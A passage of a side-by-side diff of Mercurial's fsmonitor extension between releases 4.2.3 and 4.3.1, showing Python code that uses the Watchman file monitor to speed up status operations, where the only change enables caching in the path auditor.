164 943c91326b23954e6e1c6960d0239511f9530258 4.2.3
164 943c91326b23954e6e1c6960d0239511f9530258 4.2.3
165 3fee7f7d2da04226914c2258cc2884dc27384fd7 4.3.1
@@ -1,712 +1,712 b''
1 # __init__.py - fsmonitor initialization and overrides
1 # __init__.py - fsmonitor initialization and overrides
2 #
2 #
3 # Copyright 2013-2016 Facebook, Inc.
3 # Copyright 2013-2016 Facebook, Inc.
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 '''Faster status operations with the Watchman file monitor (EXPERIMENTAL)
8 '''Faster status operations with the Watchman file monitor (EXPERIMENTAL)
9
9
10 Integrates the file-watching program Watchman with Mercurial to produce faster
10 Integrates the file-watching program Watchman with Mercurial to produce faster
11 status results.
11 status results.
12
12
13 On a particular Linux system, for a real-world repository with over 400,000
13 On a particular Linux system, for a real-world repository with over 400,000
14 files hosted on ext4, vanilla `hg status` takes 1.3 seconds. On the same
14 files hosted on ext4, vanilla `hg status` takes 1.3 seconds. On the same
15 system, with fsmonitor it takes about 0.3 seconds.
15 system, with fsmonitor it takes about 0.3 seconds.
16
16
17 fsmonitor requires no configuration -- it will tell Watchman about your
17 fsmonitor requires no configuration -- it will tell Watchman about your
18 repository as necessary. You'll need to install Watchman from
18 repository as necessary. You'll need to install Watchman from
19 https://facebook.github.io/watchman/ and make sure it is in your PATH.
19 https://facebook.github.io/watchman/ and make sure it is in your PATH.
20
20
21 The following configuration options exist:
21 The following configuration options exist:
22
22
23 ::
23 ::
24
24
25 [fsmonitor]
25 [fsmonitor]
26 mode = {off, on, paranoid}
26 mode = {off, on, paranoid}
27
27
28 When `mode = off`, fsmonitor will disable itself (similar to not loading the
28 When `mode = off`, fsmonitor will disable itself (similar to not loading the
29 extension at all). When `mode = on`, fsmonitor will be enabled (the default).
29 extension at all). When `mode = on`, fsmonitor will be enabled (the default).
30 When `mode = paranoid`, fsmonitor will query both Watchman and the filesystem,
30 When `mode = paranoid`, fsmonitor will query both Watchman and the filesystem,
31 and ensure that the results are consistent.
31 and ensure that the results are consistent.
32
32
33 ::
33 ::
34
34
35 [fsmonitor]
35 [fsmonitor]
36 timeout = (float)
36 timeout = (float)
37
37
38 A value, in seconds, that determines how long fsmonitor will wait for Watchman
38 A value, in seconds, that determines how long fsmonitor will wait for Watchman
39 to return results. Defaults to `2.0`.
39 to return results. Defaults to `2.0`.
40
40
41 ::
41 ::
42
42
43 [fsmonitor]
43 [fsmonitor]
44 blacklistusers = (list of userids)
44 blacklistusers = (list of userids)
45
45
46 A list of usernames for which fsmonitor will disable itself altogether.
46 A list of usernames for which fsmonitor will disable itself altogether.
47
47
48 ::
48 ::
49
49
50 [fsmonitor]
50 [fsmonitor]
51 walk_on_invalidate = (boolean)
51 walk_on_invalidate = (boolean)
52
52
53 Whether or not to walk the whole repo ourselves when our cached state has been
53 Whether or not to walk the whole repo ourselves when our cached state has been
54 invalidated, for example when Watchman has been restarted or .hgignore rules
54 invalidated, for example when Watchman has been restarted or .hgignore rules
55 have been changed. Walking the repo in that case can result in competing for
55 have been changed. Walking the repo in that case can result in competing for
56 I/O with Watchman. For large repos it is recommended to set this value to
56 I/O with Watchman. For large repos it is recommended to set this value to
57 false. You may wish to set this to true if you have a very fast filesystem
57 false. You may wish to set this to true if you have a very fast filesystem
58 that can outpace the IPC overhead of getting the result data for the full repo
58 that can outpace the IPC overhead of getting the result data for the full repo
59 from Watchman. Defaults to false.
59 from Watchman. Defaults to false.
60
60
61 fsmonitor is incompatible with the largefiles and eol extensions, and
61 fsmonitor is incompatible with the largefiles and eol extensions, and
62 will disable itself if any of those are active.
62 will disable itself if any of those are active.
63
63
64 '''
64 '''
65
65
66 # Platforms Supported
66 # Platforms Supported
67 # ===================
67 # ===================
68 #
68 #
69 # **Linux:** *Stable*. Watchman and fsmonitor are both known to work reliably,
69 # **Linux:** *Stable*. Watchman and fsmonitor are both known to work reliably,
70 # even under severe loads.
70 # even under severe loads.
71 #
71 #
72 # **Mac OS X:** *Stable*. The Mercurial test suite passes with fsmonitor
72 # **Mac OS X:** *Stable*. The Mercurial test suite passes with fsmonitor
73 # turned on, on case-insensitive HFS+. There has been a reasonable amount of
73 # turned on, on case-insensitive HFS+. There has been a reasonable amount of
74 # user testing under normal loads.
74 # user testing under normal loads.
75 #
75 #
76 # **Solaris, BSD:** *Alpha*. watchman and fsmonitor are believed to work, but
76 # **Solaris, BSD:** *Alpha*. watchman and fsmonitor are believed to work, but
77 # very little testing has been done.
77 # very little testing has been done.
78 #
78 #
79 # **Windows:** *Alpha*. Not in a release version of watchman or fsmonitor yet.
79 # **Windows:** *Alpha*. Not in a release version of watchman or fsmonitor yet.
80 #
80 #
81 # Known Issues
81 # Known Issues
82 # ============
82 # ============
83 #
83 #
84 # * fsmonitor will disable itself if any of the following extensions are
84 # * fsmonitor will disable itself if any of the following extensions are
85 # enabled: largefiles, inotify, eol; or if the repository has subrepos.
85 # enabled: largefiles, inotify, eol; or if the repository has subrepos.
86 # * fsmonitor will produce incorrect results if nested repos that are not
86 # * fsmonitor will produce incorrect results if nested repos that are not
87 # subrepos exist. *Workaround*: add nested repo paths to your `.hgignore`.
87 # subrepos exist. *Workaround*: add nested repo paths to your `.hgignore`.
88 #
88 #
89 # The issues related to nested repos and subrepos are probably not fundamental
89 # The issues related to nested repos and subrepos are probably not fundamental
90 # ones. Patches to fix them are welcome.
90 # ones. Patches to fix them are welcome.
91
91
92 from __future__ import absolute_import
92 from __future__ import absolute_import
93
93
94 import codecs
94 import codecs
95 import hashlib
95 import hashlib
96 import os
96 import os
97 import stat
97 import stat
98 import sys
98 import sys
99
99
100 from mercurial.i18n import _
100 from mercurial.i18n import _
101 from mercurial import (
101 from mercurial import (
102 context,
102 context,
103 encoding,
103 encoding,
104 error,
104 error,
105 extensions,
105 extensions,
106 localrepo,
106 localrepo,
107 merge,
107 merge,
108 pathutil,
108 pathutil,
109 pycompat,
109 pycompat,
110 scmutil,
110 scmutil,
111 util,
111 util,
112 )
112 )
113 from mercurial import match as matchmod
113 from mercurial import match as matchmod
114
114
115 from . import (
115 from . import (
116 pywatchman,
116 pywatchman,
117 state,
117 state,
118 watchmanclient,
118 watchmanclient,
119 )
119 )
120
120
121 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
121 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
122 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
122 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
123 # be specifying the version(s) of Mercurial they are tested with, or
123 # be specifying the version(s) of Mercurial they are tested with, or
124 # leave the attribute unspecified.
124 # leave the attribute unspecified.
125 testedwith = 'ships-with-hg-core'
125 testedwith = 'ships-with-hg-core'
126
126
127 # This extension is incompatible with the following blacklisted extensions
127 # This extension is incompatible with the following blacklisted extensions
128 # and will disable itself when encountering one of these:
128 # and will disable itself when encountering one of these:
129 _blacklist = ['largefiles', 'eol']
129 _blacklist = ['largefiles', 'eol']
130
130
131 def _handleunavailable(ui, state, ex):
131 def _handleunavailable(ui, state, ex):
132 """Exception handler for Watchman interaction exceptions"""
132 """Exception handler for Watchman interaction exceptions"""
133 if isinstance(ex, watchmanclient.Unavailable):
133 if isinstance(ex, watchmanclient.Unavailable):
134 if ex.warn:
134 if ex.warn:
135 ui.warn(str(ex) + '\n')
135 ui.warn(str(ex) + '\n')
136 if ex.invalidate:
136 if ex.invalidate:
137 state.invalidate()
137 state.invalidate()
138 ui.log('fsmonitor', 'Watchman unavailable: %s\n', ex.msg)
138 ui.log('fsmonitor', 'Watchman unavailable: %s\n', ex.msg)
139 else:
139 else:
140 ui.log('fsmonitor', 'Watchman exception: %s\n', ex)
140 ui.log('fsmonitor', 'Watchman exception: %s\n', ex)
141
141
142 def _hashignore(ignore):
142 def _hashignore(ignore):
143 """Calculate hash for ignore patterns and filenames
143 """Calculate hash for ignore patterns and filenames
144
144
145 If this information changes between Mercurial invocations, we can't
145 If this information changes between Mercurial invocations, we can't
146 rely on Watchman information anymore and have to re-scan the working
146 rely on Watchman information anymore and have to re-scan the working
147 copy.
147 copy.
148
148
149 """
149 """
150 sha1 = hashlib.sha1()
150 sha1 = hashlib.sha1()
151 sha1.update(repr(ignore))
151 sha1.update(repr(ignore))
152 return sha1.hexdigest()
152 return sha1.hexdigest()
153
153
154 _watchmanencoding = pywatchman.encoding.get_local_encoding()
154 _watchmanencoding = pywatchman.encoding.get_local_encoding()
155 _fsencoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
155 _fsencoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
156 _fixencoding = codecs.lookup(_watchmanencoding) != codecs.lookup(_fsencoding)
156 _fixencoding = codecs.lookup(_watchmanencoding) != codecs.lookup(_fsencoding)
157
157
158 def _watchmantofsencoding(path):
158 def _watchmantofsencoding(path):
159 """Fix path to match watchman and local filesystem encoding
159 """Fix path to match watchman and local filesystem encoding
160
160
161 watchman's paths encoding can differ from filesystem encoding. For example,
161 watchman's paths encoding can differ from filesystem encoding. For example,
162 on Windows, it's always utf-8.
162 on Windows, it's always utf-8.
163 """
163 """
164 try:
164 try:
165 decoded = path.decode(_watchmanencoding)
165 decoded = path.decode(_watchmanencoding)
166 except UnicodeDecodeError as e:
166 except UnicodeDecodeError as e:
167 raise error.Abort(str(e), hint='watchman encoding error')
167 raise error.Abort(str(e), hint='watchman encoding error')
168
168
169 try:
169 try:
170 encoded = decoded.encode(_fsencoding, 'strict')
170 encoded = decoded.encode(_fsencoding, 'strict')
171 except UnicodeEncodeError as e:
171 except UnicodeEncodeError as e:
172 raise error.Abort(str(e))
172 raise error.Abort(str(e))
173
173
174 return encoded
174 return encoded
175
175
176 def overridewalk(orig, self, match, subrepos, unknown, ignored, full=True):
176 def overridewalk(orig, self, match, subrepos, unknown, ignored, full=True):
177 '''Replacement for dirstate.walk, hooking into Watchman.
177 '''Replacement for dirstate.walk, hooking into Watchman.
178
178
179 Whenever full is False, ignored is False, and the Watchman client is
179 Whenever full is False, ignored is False, and the Watchman client is
180 available, use Watchman combined with saved state to possibly return only a
180 available, use Watchman combined with saved state to possibly return only a
181 subset of files.'''
181 subset of files.'''
182 def bail():
182 def bail():
183 return orig(match, subrepos, unknown, ignored, full=True)
183 return orig(match, subrepos, unknown, ignored, full=True)
184
184
185 if full or ignored or not self._watchmanclient.available():
185 if full or ignored or not self._watchmanclient.available():
186 return bail()
186 return bail()
187 state = self._fsmonitorstate
187 state = self._fsmonitorstate
188 clock, ignorehash, notefiles = state.get()
188 clock, ignorehash, notefiles = state.get()
189 if not clock:
189 if not clock:
190 if state.walk_on_invalidate:
190 if state.walk_on_invalidate:
191 return bail()
191 return bail()
192 # Initial NULL clock value, see
192 # Initial NULL clock value, see
193 # https://facebook.github.io/watchman/docs/clockspec.html
193 # https://facebook.github.io/watchman/docs/clockspec.html
194 clock = 'c:0:0'
194 clock = 'c:0:0'
195 notefiles = []
195 notefiles = []
196
196
197 def fwarn(f, msg):
197 def fwarn(f, msg):
198 self._ui.warn('%s: %s\n' % (self.pathto(f), msg))
198 self._ui.warn('%s: %s\n' % (self.pathto(f), msg))
199 return False
199 return False
200
200
201 def badtype(mode):
201 def badtype(mode):
202 kind = _('unknown')
202 kind = _('unknown')
203 if stat.S_ISCHR(mode):
203 if stat.S_ISCHR(mode):
204 kind = _('character device')
204 kind = _('character device')
205 elif stat.S_ISBLK(mode):
205 elif stat.S_ISBLK(mode):
206 kind = _('block device')
206 kind = _('block device')
207 elif stat.S_ISFIFO(mode):
207 elif stat.S_ISFIFO(mode):
208 kind = _('fifo')
208 kind = _('fifo')
209 elif stat.S_ISSOCK(mode):
209 elif stat.S_ISSOCK(mode):
210 kind = _('socket')
210 kind = _('socket')
211 elif stat.S_ISDIR(mode):
211 elif stat.S_ISDIR(mode):
212 kind = _('directory')
212 kind = _('directory')
213 return _('unsupported file type (type is %s)') % kind
213 return _('unsupported file type (type is %s)') % kind
214
214
215 ignore = self._ignore
215 ignore = self._ignore
216 dirignore = self._dirignore
216 dirignore = self._dirignore
217 if unknown:
217 if unknown:
218 if _hashignore(ignore) != ignorehash and clock != 'c:0:0':
218 if _hashignore(ignore) != ignorehash and clock != 'c:0:0':
219 # ignore list changed -- can't rely on Watchman state any more
219 # ignore list changed -- can't rely on Watchman state any more
220 if state.walk_on_invalidate:
220 if state.walk_on_invalidate:
221 return bail()
221 return bail()
222 notefiles = []
222 notefiles = []
223 clock = 'c:0:0'
223 clock = 'c:0:0'
224 else:
224 else:
225 # always ignore
225 # always ignore
226 ignore = util.always
226 ignore = util.always
227 dirignore = util.always
227 dirignore = util.always
228
228
229 matchfn = match.matchfn
229 matchfn = match.matchfn
230 matchalways = match.always()
230 matchalways = match.always()
231 dmap = self._map
231 dmap = self._map
232 nonnormalset = getattr(self, '_nonnormalset', None)
232 nonnormalset = getattr(self, '_nonnormalset', None)
233
233
234 copymap = self._copymap
234 copymap = self._copymap
235 getkind = stat.S_IFMT
235 getkind = stat.S_IFMT
236 dirkind = stat.S_IFDIR
236 dirkind = stat.S_IFDIR
237 regkind = stat.S_IFREG
237 regkind = stat.S_IFREG
238 lnkkind = stat.S_IFLNK
238 lnkkind = stat.S_IFLNK
239 join = self._join
239 join = self._join
240 normcase = util.normcase
240 normcase = util.normcase
241 fresh_instance = False
241 fresh_instance = False
242
242
243 exact = skipstep3 = False
243 exact = skipstep3 = False
244 if match.isexact(): # match.exact
244 if match.isexact(): # match.exact
245 exact = True
245 exact = True
246 dirignore = util.always # skip step 2
246 dirignore = util.always # skip step 2
247 elif match.prefix(): # match.match, no patterns
247 elif match.prefix(): # match.match, no patterns
248 skipstep3 = True
248 skipstep3 = True
249
249
250 if not exact and self._checkcase:
250 if not exact and self._checkcase:
251 # note that even though we could receive directory entries, we're only
251 # note that even though we could receive directory entries, we're only
252 # interested in checking if a file with the same name exists. So only
252 # interested in checking if a file with the same name exists. So only
253 # normalize files if possible.
253 # normalize files if possible.
254 normalize = self._normalizefile
254 normalize = self._normalizefile
255 skipstep3 = False
255 skipstep3 = False
256 else:
256 else:
257 normalize = None
257 normalize = None
258
258
259 # step 1: find all explicit files
259 # step 1: find all explicit files
260 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
260 results, work, dirsnotfound = self._walkexplicit(match, subrepos)
261
261
262 skipstep3 = skipstep3 and not (work or dirsnotfound)
262 skipstep3 = skipstep3 and not (work or dirsnotfound)
263 work = [d for d in work if not dirignore(d[0])]
263 work = [d for d in work if not dirignore(d[0])]
264
264
265 if not work and (exact or skipstep3):
265 if not work and (exact or skipstep3):
266 for s in subrepos:
266 for s in subrepos:
267 del results[s]
267 del results[s]
268 del results['.hg']
268 del results['.hg']
269 return results
269 return results
270
270
271 # step 2: query Watchman
271 # step 2: query Watchman
272 try:
272 try:
273 # Use the user-configured timeout for the query.
273 # Use the user-configured timeout for the query.
274 # Add a little slack over the top of the user query to allow for
274 # Add a little slack over the top of the user query to allow for
275 # overheads while transferring the data
275 # overheads while transferring the data
276 self._watchmanclient.settimeout(state.timeout + 0.1)
276 self._watchmanclient.settimeout(state.timeout + 0.1)
277 result = self._watchmanclient.command('query', {
277 result = self._watchmanclient.command('query', {
278 'fields': ['mode', 'mtime', 'size', 'exists', 'name'],
278 'fields': ['mode', 'mtime', 'size', 'exists', 'name'],
279 'since': clock,
279 'since': clock,
280 'expression': [
280 'expression': [
281 'not', [
281 'not', [
282 'anyof', ['dirname', '.hg'],
282 'anyof', ['dirname', '.hg'],
283 ['name', '.hg', 'wholename']
283 ['name', '.hg', 'wholename']
284 ]
284 ]
285 ],
285 ],
286 'sync_timeout': int(state.timeout * 1000),
286 'sync_timeout': int(state.timeout * 1000),
287 'empty_on_fresh_instance': state.walk_on_invalidate,
287 'empty_on_fresh_instance': state.walk_on_invalidate,
288 })
288 })
289 except Exception as ex:
289 except Exception as ex:
290 _handleunavailable(self._ui, state, ex)
290 _handleunavailable(self._ui, state, ex)
291 self._watchmanclient.clearconnection()
291 self._watchmanclient.clearconnection()
292 return bail()
292 return bail()
293 else:
293 else:
294 # We need to propagate the last observed clock up so that we
294 # We need to propagate the last observed clock up so that we
295 # can use it for our next query
295 # can use it for our next query
296 state.setlastclock(result['clock'])
296 state.setlastclock(result['clock'])
297 if result['is_fresh_instance']:
297 if result['is_fresh_instance']:
298 if state.walk_on_invalidate:
298 if state.walk_on_invalidate:
299 state.invalidate()
299 state.invalidate()
300 return bail()
300 return bail()
301 fresh_instance = True
301 fresh_instance = True
302 # Ignore any prior noteable files from the state info
302 # Ignore any prior noteable files from the state info
303 notefiles = []
303 notefiles = []
304
304
305 # for file paths which require normalization and we encounter a case
305 # for file paths which require normalization and we encounter a case
306 # collision, we store our own foldmap
306 # collision, we store our own foldmap
307 if normalize:
307 if normalize:
308 foldmap = dict((normcase(k), k) for k in results)
308 foldmap = dict((normcase(k), k) for k in results)
309
309
310 switch_slashes = pycompat.ossep == '\\'
310 switch_slashes = pycompat.ossep == '\\'
311 # The order of the results is, strictly speaking, undefined.
311 # The order of the results is, strictly speaking, undefined.
312 # For case changes on a case insensitive filesystem we may receive
312 # For case changes on a case insensitive filesystem we may receive
313 # two entries, one with exists=True and another with exists=False.
313 # two entries, one with exists=True and another with exists=False.
314 # The exists=True entries in the same response should be interpreted
314 # The exists=True entries in the same response should be interpreted
315 # as being happens-after the exists=False entries due to the way that
315 # as being happens-after the exists=False entries due to the way that
316 # Watchman tracks files. We use this property to reconcile deletes
316 # Watchman tracks files. We use this property to reconcile deletes
317 # for name case changes.
317 # for name case changes.
318 for entry in result['files']:
318 for entry in result['files']:
319 fname = entry['name']
319 fname = entry['name']
320 if _fixencoding:
320 if _fixencoding:
321 fname = _watchmantofsencoding(fname)
321 fname = _watchmantofsencoding(fname)
322 if switch_slashes:
322 if switch_slashes:
323 fname = fname.replace('\\', '/')
323 fname = fname.replace('\\', '/')
324 if normalize:
324 if normalize:
325 normed = normcase(fname)
325 normed = normcase(fname)
326 fname = normalize(fname, True, True)
326 fname = normalize(fname, True, True)
327 foldmap[normed] = fname
327 foldmap[normed] = fname
328 fmode = entry['mode']
328 fmode = entry['mode']
329 fexists = entry['exists']
329 fexists = entry['exists']
330 kind = getkind(fmode)
330 kind = getkind(fmode)
331
331
332 if not fexists:
332 if not fexists:
333 # if marked as deleted and we don't already have a change
333 # if marked as deleted and we don't already have a change
334 # record, mark it as deleted. If we already have an entry
334 # record, mark it as deleted. If we already have an entry
335 # for fname then it was either part of walkexplicit or was
335 # for fname then it was either part of walkexplicit or was
336 # an earlier result that was a case change
336 # an earlier result that was a case change
337 if fname not in results and fname in dmap and (
337 if fname not in results and fname in dmap and (
338 matchalways or matchfn(fname)):
338 matchalways or matchfn(fname)):
339 results[fname] = None
339 results[fname] = None
340 elif kind == dirkind:
340 elif kind == dirkind:
341 if fname in dmap and (matchalways or matchfn(fname)):
341 if fname in dmap and (matchalways or matchfn(fname)):
342 results[fname] = None
342 results[fname] = None
343 elif kind == regkind or kind == lnkkind:
343 elif kind == regkind or kind == lnkkind:
344 if fname in dmap:
344 if fname in dmap:
345 if matchalways or matchfn(fname):
345 if matchalways or matchfn(fname):
346 results[fname] = entry
346 results[fname] = entry
347 elif (matchalways or matchfn(fname)) and not ignore(fname):
347 elif (matchalways or matchfn(fname)) and not ignore(fname):
348 results[fname] = entry
348 results[fname] = entry
349 elif fname in dmap and (matchalways or matchfn(fname)):
349 elif fname in dmap and (matchalways or matchfn(fname)):
350 results[fname] = None
350 results[fname] = None
351
351
352 # step 3: query notable files we don't already know about
352 # step 3: query notable files we don't already know about
353 # XXX try not to iterate over the entire dmap
353 # XXX try not to iterate over the entire dmap
354 if normalize:
354 if normalize:
355 # any notable files that have changed case will already be handled
355 # any notable files that have changed case will already be handled
356 # above, so just check membership in the foldmap
356 # above, so just check membership in the foldmap
357 notefiles = set((normalize(f, True, True) for f in notefiles
357 notefiles = set((normalize(f, True, True) for f in notefiles
358 if normcase(f) not in foldmap))
358 if normcase(f) not in foldmap))
359 visit = set((f for f in notefiles if (f not in results and matchfn(f)
359 visit = set((f for f in notefiles if (f not in results and matchfn(f)
360 and (f in dmap or not ignore(f)))))
360 and (f in dmap or not ignore(f)))))
361
361
362 if nonnormalset is not None and not fresh_instance:
362 if nonnormalset is not None and not fresh_instance:
363 if matchalways:
363 if matchalways:
364 visit.update(f for f in nonnormalset if f not in results)
364 visit.update(f for f in nonnormalset if f not in results)
365 visit.update(f for f in copymap if f not in results)
365 visit.update(f for f in copymap if f not in results)
366 else:
366 else:
367 visit.update(f for f in nonnormalset
367 visit.update(f for f in nonnormalset
368 if f not in results and matchfn(f))
368 if f not in results and matchfn(f))
369 visit.update(f for f in copymap
369 visit.update(f for f in copymap
370 if f not in results and matchfn(f))
370 if f not in results and matchfn(f))
371 else:
371 else:
372 if matchalways:
372 if matchalways:
373 visit.update(f for f, st in dmap.iteritems()
373 visit.update(f for f, st in dmap.iteritems()
374 if (f not in results and
374 if (f not in results and
375 (st[2] < 0 or st[0] != 'n' or fresh_instance)))
375 (st[2] < 0 or st[0] != 'n' or fresh_instance)))
376 visit.update(f for f in copymap if f not in results)
376 visit.update(f for f in copymap if f not in results)
377 else:
377 else:
378 visit.update(f for f, st in dmap.iteritems()
378 visit.update(f for f, st in dmap.iteritems()
379 if (f not in results and
379 if (f not in results and
380 (st[2] < 0 or st[0] != 'n' or fresh_instance)
380 (st[2] < 0 or st[0] != 'n' or fresh_instance)
381 and matchfn(f)))
381 and matchfn(f)))
382 visit.update(f for f in copymap
382 visit.update(f for f in copymap
383 if f not in results and matchfn(f))
383 if f not in results and matchfn(f))
384
384
385 audit = pathutil.pathauditor(self._root).check
385 audit = pathutil.pathauditor(self._root, cached=True).check
386 auditpass = [f for f in visit if audit(f)]
386 auditpass = [f for f in visit if audit(f)]
387 auditpass.sort()
387 auditpass.sort()
388 auditfail = visit.difference(auditpass)
388 auditfail = visit.difference(auditpass)
389 for f in auditfail:
389 for f in auditfail:
390 results[f] = None
390 results[f] = None
391
391
392 nf = iter(auditpass).next
392 nf = iter(auditpass).next
393 for st in util.statfiles([join(f) for f in auditpass]):
393 for st in util.statfiles([join(f) for f in auditpass]):
394 f = nf()
394 f = nf()
395 if st or f in dmap:
395 if st or f in dmap:
396 results[f] = st
396 results[f] = st
397
397
398 for s in subrepos:
398 for s in subrepos:
399 del results[s]
399 del results[s]
400 del results['.hg']
400 del results['.hg']
401 return results
401 return results
402
402
403 def overridestatus(
403 def overridestatus(
404 orig, self, node1='.', node2=None, match=None, ignored=False,
404 orig, self, node1='.', node2=None, match=None, ignored=False,
405 clean=False, unknown=False, listsubrepos=False):
405 clean=False, unknown=False, listsubrepos=False):
406 listignored = ignored
406 listignored = ignored
407 listclean = clean
407 listclean = clean
408 listunknown = unknown
408 listunknown = unknown
409
409
410 def _cmpsets(l1, l2):
410 def _cmpsets(l1, l2):
411 try:
411 try:
412 if 'FSMONITOR_LOG_FILE' in encoding.environ:
412 if 'FSMONITOR_LOG_FILE' in encoding.environ:
413 fn = encoding.environ['FSMONITOR_LOG_FILE']
413 fn = encoding.environ['FSMONITOR_LOG_FILE']
414 f = open(fn, 'wb')
414 f = open(fn, 'wb')
415 else:
415 else:
416 fn = 'fsmonitorfail.log'
416 fn = 'fsmonitorfail.log'
417 f = self.opener(fn, 'wb')
417 f = self.opener(fn, 'wb')
418 except (IOError, OSError):
418 except (IOError, OSError):
419 self.ui.warn(_('warning: unable to write to %s\n') % fn)
419 self.ui.warn(_('warning: unable to write to %s\n') % fn)
420 return
420 return
421
421
422 try:
422 try:
423 for i, (s1, s2) in enumerate(zip(l1, l2)):
423 for i, (s1, s2) in enumerate(zip(l1, l2)):
424 if set(s1) != set(s2):
424 if set(s1) != set(s2):
425 f.write('sets at position %d are unequal\n' % i)
425 f.write('sets at position %d are unequal\n' % i)
426 f.write('watchman returned: %s\n' % s1)
426 f.write('watchman returned: %s\n' % s1)
427 f.write('stat returned: %s\n' % s2)
427 f.write('stat returned: %s\n' % s2)
428 finally:
428 finally:
429 f.close()
429 f.close()
430
430
431 if isinstance(node1, context.changectx):
431 if isinstance(node1, context.changectx):
432 ctx1 = node1
432 ctx1 = node1
433 else:
433 else:
434 ctx1 = self[node1]
434 ctx1 = self[node1]
435 if isinstance(node2, context.changectx):
435 if isinstance(node2, context.changectx):
436 ctx2 = node2
436 ctx2 = node2
437 else:
437 else:
438 ctx2 = self[node2]
438 ctx2 = self[node2]
439
439
440 working = ctx2.rev() is None
440 working = ctx2.rev() is None
441 parentworking = working and ctx1 == self['.']
441 parentworking = working and ctx1 == self['.']
442 match = match or matchmod.always(self.root, self.getcwd())
442 match = match or matchmod.always(self.root, self.getcwd())
443
443
444 # Maybe we can use this opportunity to update Watchman's state.
444 # Maybe we can use this opportunity to update Watchman's state.
445 # Mercurial uses workingcommitctx and/or memctx to represent the part of
445 # Mercurial uses workingcommitctx and/or memctx to represent the part of
446 # the workingctx that is to be committed. So don't update the state in
446 # the workingctx that is to be committed. So don't update the state in
447 # that case.
447 # that case.
448 # HG_PENDING is set in the environment when the dirstate is being updated
448 # HG_PENDING is set in the environment when the dirstate is being updated
449 # in the middle of a transaction; we must not update our state in that
449 # in the middle of a transaction; we must not update our state in that
450 # case, or we risk forgetting about changes in the working copy.
450 # case, or we risk forgetting about changes in the working copy.
451 updatestate = (parentworking and match.always() and
451 updatestate = (parentworking and match.always() and
452 not isinstance(ctx2, (context.workingcommitctx,
452 not isinstance(ctx2, (context.workingcommitctx,
453 context.memctx)) and
453 context.memctx)) and
454 'HG_PENDING' not in encoding.environ)
454 'HG_PENDING' not in encoding.environ)
455
455
456 try:
456 try:
457 if self._fsmonitorstate.walk_on_invalidate:
457 if self._fsmonitorstate.walk_on_invalidate:
458 # Use a short timeout to query the current clock. If that
458 # Use a short timeout to query the current clock. If that
459 # takes too long then we assume that the service will be slow
459 # takes too long then we assume that the service will be slow
460 # to answer our query.
460 # to answer our query.
461 # walk_on_invalidate indicates that we prefer to walk the
461 # walk_on_invalidate indicates that we prefer to walk the
462 # tree ourselves because we can ignore portions that Watchman
462 # tree ourselves because we can ignore portions that Watchman
463 # cannot and we tend to be faster in the warmer buffer cache
463 # cannot and we tend to be faster in the warmer buffer cache
464 # cases.
464 # cases.
465 self._watchmanclient.settimeout(0.1)
465 self._watchmanclient.settimeout(0.1)
466 else:
466 else:
467 # Give Watchman more time to potentially complete its walk
467 # Give Watchman more time to potentially complete its walk
468 # and return the initial clock. In this mode we assume that
468 # and return the initial clock. In this mode we assume that
469 # the filesystem will be slower than parsing a potentially
469 # the filesystem will be slower than parsing a potentially
470 # very large Watchman result set.
470 # very large Watchman result set.
471 self._watchmanclient.settimeout(
471 self._watchmanclient.settimeout(
472 self._fsmonitorstate.timeout + 0.1)
472 self._fsmonitorstate.timeout + 0.1)
473 startclock = self._watchmanclient.getcurrentclock()
473 startclock = self._watchmanclient.getcurrentclock()
474 except Exception as ex:
474 except Exception as ex:
475 self._watchmanclient.clearconnection()
475 self._watchmanclient.clearconnection()
476 _handleunavailable(self.ui, self._fsmonitorstate, ex)
476 _handleunavailable(self.ui, self._fsmonitorstate, ex)
477 # boo, Watchman failed. bail
477 # boo, Watchman failed. bail
478 return orig(node1, node2, match, listignored, listclean,
478 return orig(node1, node2, match, listignored, listclean,
479 listunknown, listsubrepos)
479 listunknown, listsubrepos)
480
480
481 if updatestate:
481 if updatestate:
482 # We need info about unknown files. This may make things slower the
482 # We need info about unknown files. This may make things slower the
483 # first time, but whatever.
483 # first time, but whatever.
484 stateunknown = True
484 stateunknown = True
485 else:
485 else:
486 stateunknown = listunknown
486 stateunknown = listunknown
487
487
488 if updatestate:
488 if updatestate:
489 ps = poststatus(startclock)
489 ps = poststatus(startclock)
490 self.addpostdsstatus(ps)
490 self.addpostdsstatus(ps)
491
491
492 r = orig(node1, node2, match, listignored, listclean, stateunknown,
492 r = orig(node1, node2, match, listignored, listclean, stateunknown,
493 listsubrepos)
493 listsubrepos)
494 modified, added, removed, deleted, unknown, ignored, clean = r
494 modified, added, removed, deleted, unknown, ignored, clean = r
495
495
496 if not listunknown:
496 if not listunknown:
497 unknown = []
497 unknown = []
498
498
499 # don't do paranoid checks if we're not going to query Watchman anyway
499 # don't do paranoid checks if we're not going to query Watchman anyway
500 full = listclean or match.traversedir is not None
500 full = listclean or match.traversedir is not None
501 if self._fsmonitorstate.mode == 'paranoid' and not full:
501 if self._fsmonitorstate.mode == 'paranoid' and not full:
502 # run status again and fall back to the old walk this time
502 # run status again and fall back to the old walk this time
503 self.dirstate._fsmonitordisable = True
503 self.dirstate._fsmonitordisable = True
504
504
505 # shut the UI up
505 # shut the UI up
506 quiet = self.ui.quiet
506 quiet = self.ui.quiet
507 self.ui.quiet = True
507 self.ui.quiet = True
508 fout, ferr = self.ui.fout, self.ui.ferr
508 fout, ferr = self.ui.fout, self.ui.ferr
509 self.ui.fout = self.ui.ferr = open(os.devnull, 'wb')
509 self.ui.fout = self.ui.ferr = open(os.devnull, 'wb')
510
510
511 try:
511 try:
512 rv2 = orig(
512 rv2 = orig(
513 node1, node2, match, listignored, listclean, listunknown,
513 node1, node2, match, listignored, listclean, listunknown,
514 listsubrepos)
514 listsubrepos)
515 finally:
515 finally:
516 self.dirstate._fsmonitordisable = False
516 self.dirstate._fsmonitordisable = False
517 self.ui.quiet = quiet
517 self.ui.quiet = quiet
518 self.ui.fout, self.ui.ferr = fout, ferr
518 self.ui.fout, self.ui.ferr = fout, ferr
519
519
520 # clean isn't tested since it's set to True above
520 # clean isn't tested since it's set to True above
